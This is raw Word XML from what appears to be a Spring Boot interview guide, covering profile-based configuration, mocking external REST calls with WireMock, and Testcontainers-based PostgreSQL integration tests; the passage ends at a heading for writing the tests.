    <w:p w14:paraId="7DDEB27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override properties at runtime by passing command-line arguments or using @Value in your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63714D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using @Value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CACA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Value("${spring.datasource.url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57914B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ivate String datasourceUrl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCF2C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then override this property by passing a command-line argument like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FBA8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datasource.url=jdbc:mysql://new-database-url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E742EF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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3AC5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Define environment-specific configurations in application-{profile}.properties or application-{profile}.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BADE3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ctivate Profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Activate the profile using --spring.profiles.active, environment variables, or configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F72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 Annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use the @Profile annotation on beans to load them only in specific profiles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095E3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Override Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Override properties at runtime using command-line arguments or @Value injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EF89ED" w14:textId="307A37FC" w:rsidR="00132306"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using Spring Boot profiles, you can easily manage environment-specific configurations and ensure the correct setup for different environments like dev, test, and prod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDFA45A" w14:textId="32C626A0" w:rsidR="001A12CD" w:rsidRDefault="00000000" w:rsidP="00132306">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B109A2">
          <v:rect id="_x0000_i2748" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C49B5E" w14:textId="77777777" w:rsidR="001A12CD" w:rsidRDefault="001A12CD">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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A9C965" w14:textId="1760E81D" w:rsidR="001A12CD" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4641" w:rsidP="00EB4641">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="684" w:name="_Toc197867898"/>
      <w:r w:rsidRPr="00EB4641">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How do you mock external REST API calls by adding integration test in Spring Boot Application service</w:t>
      </w:r>
      <w:r w:rsidR="001A12CD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="684"/>
    </w:p>
    <w:p w14:paraId="27CC8F9F" w14:textId="65C9BA32" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="00084190">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T</w:t>
      </w:r>
      <w:r w:rsidRPr="000626CA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>o mock external REST API calls in a Spring Boot service during integration testing, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAE8CE4"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1. Add Dependencies (Gradle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6007A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Include the necessary libraries for mocking and testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B118E9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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B99292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boot:spring-boot-starter-test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC8A6B"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cloud:spring-cloud-starter-netflix-eureka-client'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE70F2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org.springframework.cloud:spring-cloud-starter-openfeign'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C19D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Implementation 'com.github.tomakehurst:wiremock-jre8:2.35.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B71C9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3CD00F57"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2. Create the Service to Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E9519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Assume your service uses WebClient or RestTemplate to call an external API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB4D7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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08B37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public class ExternalApiService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA9EA6" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0510C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rivate final WebClient webClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661B79F" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCE4F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ExternalApiService(WebClient.Builder webClientBuilder) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC68AC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his.webClient = webClientBuilder.baseUrl("http://external-api.com").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C5F94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42F84F97" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B121BF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String getDataFromApi() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C695F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urn webClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74CF8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uri("/data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754AF005"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E6D89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odyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F0A1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lock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6903F9C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5891982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6487536E"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3. Integration Test with WireMock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36988A7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reate an integration test that mocks the external API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1503BE9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pringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB42AE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AutoConfigureWireMock(port = 0) // Dynamically allocate a port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DFD882"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lass ExternalApiServiceTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B81CA37" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D379BC3"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195F646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rivate ExternalApiService externalApiService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A9D39" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758E988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eforeAll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7F5B5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tatic void setup() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E138F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reMock.configureFor("localhost", WireMock.port());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1553DD9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4D6791C4" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194FDC6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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C6365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void getDataFromApi_shouldReturnMockedResponse() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1FEE9D"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 Mock the external API response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611E7A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reMock.stubFor(WireMock.get("/data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F1042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llReturn(WireMock.aResponse()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24392A2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thStatus(200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40120549"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ithBody("Mocked Response")));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E619E6F" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5207C4C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 Call the service method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1569A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tring response = externalApiService.getDataFromApi();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4381FCB6" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC8A6E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        // Assert the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B910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assertEquals("Mocked Response", response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB4BAA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1668E1A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50A650E2"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4. Configuration for WireMock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1779E04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Make sure the WebClient in the service points to the WireMock server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E703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TestConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42E491"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static class TestConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37473D35" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4303EC60"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088FFBB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public WebClient.Builder webClientBuilder(@Value("${wiremock.server.base-url}") String baseUrl) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B850FB"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return WebClient.builder().baseUrl(baseUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38077B2F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D974A"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71A3DD"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5. Application Test Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A80EA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wiremock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4248084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server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60731257"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    base-url: http://localhost:${wiremock.server.port}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39937F6E" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000626CA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8C610C"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="000626CA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WireMock</w:t>
      </w:r>
      <w:r w:rsidRPr="000626CA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to stub and mock the external API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2673EB25"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Configure your service to use the WireMock server URL during testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48109F7E"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Use @AutoConfigureWireMock to dynamically manage ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C36F54" w14:textId="77777777" w:rsidR="000626CA" w:rsidRPr="000626CA" w:rsidRDefault="000626CA" w:rsidP="000626CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000626CA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Verify the response using assertions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B64DAD"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83492">
          <v:rect id="_x0000_i2749" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CED1D3" w14:textId="3BD54A98"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5" w:name="_Toc197867899"/>
      <w:r w:rsidRPr="00E5597A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you use Test containers to write effective integration test for Spring Boot application interacting with a database</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="685"/>
    </w:p>
    <w:p w14:paraId="5D543550" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00187C12" w:rsidP="00187C12">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Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028E179B" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00187C12" w:rsidP="00187C12">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202C4B1C" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00187C12" w:rsidP="00187C12">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2123B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To use </w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Testcontainers</w:t>
      </w:r>
      <w:r w:rsidRPr="001F49B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for effective integration testing in a Spring Boot application that interacts with a database, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B64E1A0"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B30816">
          <v:rect id="_x0000_i2750" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18309A68"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1. Add Dependencies (Gradle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA055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Include Testcontainers and the required database driver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F0B7E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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBEBD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springframework.boot:spring-boot-starter-test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73245A1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testcontainers:junit-jupiter:1.19.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A2331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testcontainers:postgresql:1.19.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9020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Implementation 'org.springframework.boot:spring-boot-starter-data-jpa'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D46371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untimeOnly 'org.postgresql:postgresql'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BBCA8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454F209"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A317F">
          <v:rect id="_x0000_i2751" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D61311"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2. Define the Testcontainer Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A65E2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reate a TestContainerConfig class to initialize the PostgreSQL container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D77A68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TestConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723BB1F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TestContainerConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77279B42" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457C324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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A1BF0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PostgreSQLContainer&lt;?&gt; postgreSQLContainer() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00299B2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greSQLContainer&lt;?&gt; container = new PostgreSQLContainer&lt;&gt;("postgres:15.4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5732D2F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53D3D10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0006E17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3048FF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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113A2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container;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6944E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CA18B" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AE14B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ynamicPropertySource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D3AF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tatic void databaseProperties(DynamicPropertyRegistry registry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AC266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greSQLContainer&lt;?&gt; container = new PostgreSQLContainer&lt;&gt;("postgres:15.4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654AA70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7BF7387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563E4DE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F3E750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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1B46B0" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53737E9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url", container::getJdbcUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB561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username", container::getUsername);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B2B34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gistry.add("spring.datasource.password", container::getPassword);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5993AAF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1112A43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1332ADB2"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9B87D">
          <v:rect id="_x0000_i2752" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E45BB"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3. Spring Boot Application Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6205D60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Make sure your application uses the properties set by Testcontainers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F07B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C91B5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atasource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062BC71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river-class-name: org.postgresql.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5881339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jpa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5F6B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hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6747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dl-auto: update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DDE21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how-sql: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C37CB1F"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078E11">
          <v:rect id="_x0000_i2753" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13784FA3"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4. Create a Simple Entity and Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993DED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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D94BB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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133A118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d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0544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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6DB3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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417FDCE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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614B5B8B"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String role;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2303CF78" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643AFE9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 Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4646CCF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2530EF5A" w14:textId="77777777" w:rsidR="001F49B3" w:rsidRPr="001F49B3" w:rsidRDefault="001F49B3" w:rsidP="001F49B3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615B133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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFCA4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60520B05"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E20959">
          <v:rect id="_x0000_i2754" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="467DB6E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5. Write Integration Tests</w:t>
